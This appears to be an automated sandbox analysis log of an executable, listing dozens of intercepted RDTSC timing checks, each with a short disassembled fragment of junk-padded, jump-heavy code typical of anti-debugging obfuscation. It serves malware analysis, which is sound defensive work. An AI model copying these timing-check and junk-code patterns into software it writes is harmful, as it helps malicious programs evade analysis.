Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101BB31 second address: 101BB41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D493C17CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFE870 second address: EFE874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFE874 second address: EFE882 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F9D493C17CCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103374C second address: 1033764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D4900D0D4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1033DB4 second address: 1033DCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F9D493C17C6h 0x0000000a pop eax 0x0000000b jns 00007F9D493C17D0h 0x00000011 jmp 00007F9D493C17CAh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103434D second address: 1034357 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9D4900D0CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1038B39 second address: 1038B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1038B3D second address: 1038B47 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9D4900D0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1038C00 second address: 1038C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1038C04 second address: 1038C0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1038C0A second address: 1038C74 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9D493C17D9h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jno 00007F9D493C17D8h 0x00000014 mov eax, dword ptr [eax] 0x00000016 jmp 00007F9D493C17CFh 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F9D493C17D9h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1038C74 second address: 1038C87 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F9D4900D0CAh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103A810 second address: 103A830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F9D493C17D5h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103A371 second address: 103A39B instructions: 0x00000000 rdtsc 0x00000002 js 00007F9D4900D0C6h 0x00000008 jl 00007F9D4900D0C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 ja 00007F9D4900D0C6h 0x00000017 pop edi 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c jmp 00007F9D4900D0CCh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103A39B second address: 103A3B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F9D493C17CEh 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103A3B2 second address: 103A3CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F9D4900D0D5h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4EFF9 second address: F4F00F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D493C17D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4F1DB second address: F4F1E4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D1022A second address: 4D1029B instructions: 0x00000000 rdtsc 0x00000002 movsx edx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jmp 00007F9D493C17CCh 0x0000000c popad 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F9D493C17CEh 0x00000015 add ah, FFFFFFC8h 0x00000018 jmp 00007F9D493C17CBh 0x0000001d popfd 0x0000001e movzx eax, dx 0x00000021 popad 0x00000022 push eax 0x00000023 jmp 00007F9D493C17D2h 0x00000028 xchg eax, ebp 0x00000029 pushad 0x0000002a mov ecx, 0287287Dh 0x0000002f mov ecx, 3762CF79h 0x00000034 popad 0x00000035 mov ebp, esp 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a mov edi, 662D2504h 0x0000003f call 00007F9D493C17CDh 0x00000044 pop eax 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D1029B second address: 4D102AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov di, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, dword ptr [ebp+0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D102AF second address: 4D102B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D102B3 second address: 4D102B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D102B7 second address: 4D102BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D40519 second address: 4D405A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D4900D0CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F9D4900D0D2h 0x00000012 xor cl, 00000068h 0x00000015 jmp 00007F9D4900D0CBh 0x0000001a popfd 0x0000001b mov ax, 9E5Fh 0x0000001f popad 0x00000020 jmp 00007F9D4900D0D4h 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 jmp 00007F9D4900D0D0h 0x0000002d xchg eax, ecx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007F9D4900D0CDh 0x00000037 xor cl, FFFFFFE6h 0x0000003a jmp 00007F9D4900D0D1h 0x0000003f popfd 0x00000040 mov eax, 734C5617h 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D405A6 second address: 4D4060A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9D493C17D6h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F9D493C17CBh 0x00000011 xchg eax, ecx 0x00000012 jmp 00007F9D493C17D6h 0x00000017 xchg eax, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b call 00007F9D493C17CDh 0x00000020 pop ecx 0x00000021 call 00007F9D493C17D1h 0x00000026 pop ecx 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D4060A second address: 4D40610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D40610 second address: 4D40614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D40614 second address: 4D40643 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov cx, ECA7h 0x00000010 pushfd 0x00000011 jmp 00007F9D4900D0CCh 0x00000016 and ax, 59D8h 0x0000001b jmp 00007F9D4900D0CBh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D40643 second address: 4D40678 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D493C17D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F9D493C17CEh 0x0000000f lea eax, dword ptr [ebp-04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D40678 second address: 4D4067C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D4067C second address: 4D40682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D407FD second address: 4D40819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 mov ch, 60h 0x0000000a popad 0x0000000b leave 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9D4900D0CEh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D40819 second address: 4D4081F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D4081F second address: 4D30017 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c cmp eax, 00000000h 0x0000000f setne al 0x00000012 xor ebx, ebx 0x00000014 test al, 01h 0x00000016 jne 00007F9D4900D0C7h 0x00000018 xor eax, eax 0x0000001a sub esp, 08h 0x0000001d mov dword ptr [esp], 00000000h 0x00000024 mov dword ptr [esp+04h], 00000000h 0x0000002c call 00007F9D4CFD6503h 0x00000031 mov edi, edi 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F9D4900D0D3h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D30017 second address: 4D30044 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D493C17D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9D493C17CDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D30044 second address: 4D3004A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D3004A second address: 4D3012B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F9D493C17D4h 0x0000000f mov ebx, ecx 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 jmp 00007F9D493C17CCh 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b push ecx 0x0000001c mov ax, di 0x0000001f pop edi 0x00000020 pushfd 0x00000021 jmp 00007F9D493C17D6h 0x00000026 add cx, ADC8h 0x0000002b jmp 00007F9D493C17CBh 0x00000030 popfd 0x00000031 popad 0x00000032 push FFFFFFFEh 0x00000034 jmp 00007F9D493C17D6h 0x00000039 push 053EBFFDh 0x0000003e jmp 00007F9D493C17D1h 0x00000043 add dword ptr [esp], 706FDE4Bh 0x0000004a jmp 00007F9D493C17CEh 0x0000004f call 00007F9D493C17C9h 0x00000054 jmp 00007F9D493C17D0h 0x00000059 push eax 0x0000005a jmp 00007F9D493C17CBh 0x0000005f mov eax, dword ptr [esp+04h] 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F9D493C17D4h 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D3012B second address: 4D30131 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D30131 second address: 4D30135 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D30135 second address: 4D301B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007F9D4900D0D8h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 pushad 0x00000014 mov ebx, 62896E24h 0x00000019 mov bx, 4890h 0x0000001d popad 0x0000001e pop eax 0x0000001f jmp 00007F9D4900D0CFh 0x00000024 mov eax, dword ptr fs:[00000000h] 0x0000002a pushad 0x0000002b jmp 00007F9D4900D0D4h 0x00000030 jmp 00007F9D4900D0D2h 0x00000035 popad 0x00000036 nop 0x00000037 pushad 0x00000038 call 00007F9D4900D0CEh 0x0000003d pop ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 mov cl, 03h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D301B9 second address: 4D30212 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F9D493C17D9h 0x00000008 and ecx, 6E60B886h 0x0000000e jmp 00007F9D493C17D1h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007F9D493C17D1h 0x0000001d nop 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F9D493C17CDh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D30212 second address: 4D30239 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D4900D0D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9D4900D0CDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D30239 second address: 4D302B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D493C17D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F9D493C17CEh 0x0000000f push eax 0x00000010 jmp 00007F9D493C17CBh 0x00000015 xchg eax, ebx 0x00000016 pushad 0x00000017 push ecx 0x00000018 call 00007F9D493C17CBh 0x0000001d pop esi 0x0000001e pop edi 0x0000001f call 00007F9D493C17D6h 0x00000024 mov esi, 4915A3C1h 0x00000029 pop ecx 0x0000002a popad 0x0000002b push ecx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F9D493C17D9h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D302B2 second address: 4D302FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D4900D0D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c jmp 00007F9D4900D0CEh 0x00000011 xchg eax, edi 0x00000012 jmp 00007F9D4900D0D0h 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F9D4900D0CEh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D302FA second address: 4D30300 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D30300 second address: 4D3032D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 jmp 00007F9D4900D0D9h 0x0000000e mov eax, dword ptr [75AF4538h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D3032D second address: 4D30331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D30331 second address: 4D30337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D30337 second address: 4D30361 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, ecx 0x00000005 push eax 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [ebp-08h], eax 0x0000000d jmp 00007F9D493C17D6h 0x00000012 xor eax, ebp 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D30361 second address: 4D303BB instructions: 0x00000000 rdtsc 0x00000002 mov edi, 63D7A4CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a call 00007F9D4900D0D2h 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 popad 0x00000012 nop 0x00000013 pushad 0x00000014 mov cx, 0173h 0x00000018 mov di, ax 0x0000001b popad 0x0000001c push eax 0x0000001d pushad 0x0000001e jmp 00007F9D4900D0CBh 0x00000023 pushad 0x00000024 mov bx, ax 0x00000027 mov di, cx 0x0000002a popad 0x0000002b popad 0x0000002c nop 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F9D4900D0D6h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D303BB second address: 4D303BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D303BF second address: 4D303C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D303C5 second address: 4D30441 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D493C17CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c pushad 0x0000000d mov dx, ax 0x00000010 mov ecx, 06912FD9h 0x00000015 popad 0x00000016 mov dword ptr fs:[00000000h], eax 0x0000001c pushad 0x0000001d popad 0x0000001e mov dword ptr [ebp-18h], esp 0x00000021 jmp 00007F9D493C17CAh 0x00000026 mov eax, dword ptr fs:[00000018h] 0x0000002c jmp 00007F9D493C17D0h 0x00000031 mov ecx, dword ptr [eax+00000FDCh] 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007F9D493C17CDh 0x00000040 and si, CE86h 0x00000045 jmp 00007F9D493C17D1h 0x0000004a popfd 0x0000004b mov dx, ax 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D30441 second address: 4D30470 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D4900D0CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9D4900D0D8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D30470 second address: 4D30476 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D30476 second address: 4D304FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9D4900D0CCh 0x00000009 or ax, B6B8h 0x0000000e jmp 00007F9D4900D0CBh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F9D4900D0D8h 0x0000001a jmp 00007F9D4900D0D5h 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 jns 00007F9D4900D121h 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F9D4900D0CCh 0x00000030 jmp 00007F9D4900D0D5h 0x00000035 popfd 0x00000036 mov ax, B8A7h 0x0000003a popad 0x0000003b add eax, ecx 0x0000003d pushad 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D304FE second address: 4D3053F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F9D493C17D4h 0x0000000a add ax, 0508h 0x0000000f jmp 00007F9D493C17CBh 0x00000014 popfd 0x00000015 popad 0x00000016 popad 0x00000017 mov ecx, dword ptr [ebp+08h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F9D493C17D0h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D3053F second address: 4D30545 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D30545 second address: 4D30549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D30549 second address: 4D30562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9D4900D0CBh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D30562 second address: 4D3057F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D493C17D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20215 second address: 4D20219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20219 second address: 4D2021D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D2021D second address: 4D20223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20223 second address: 4D20229 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20229 second address: 4D2022D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D2022D second address: 4D20240 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c mov dh, cl 0x0000000e push eax 0x0000000f push edx 0x00000010 movsx edx, si 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20240 second address: 4D2025C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 jmp 00007F9D4900D0CAh 0x0000000e sub esp, 2Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov ah, dl 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D2025C second address: 4D202D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D493C17CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b jmp 00007F9D493C17D4h 0x00000010 pushad 0x00000011 jmp 00007F9D493C17D0h 0x00000016 mov edx, ecx 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b jmp 00007F9D493C17D7h 0x00000020 xchg eax, ebx 0x00000021 jmp 00007F9D493C17D6h 0x00000026 xchg eax, edi 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a movsx edx, si 0x0000002d movzx esi, di 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D202D0 second address: 4D202EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F9D4900D0CCh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D202EA second address: 4D202F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, 49F6D1A9h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D202F4 second address: 4D2031F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D4900D0CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9D4900D0D5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D2037F second address: 4D20383 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
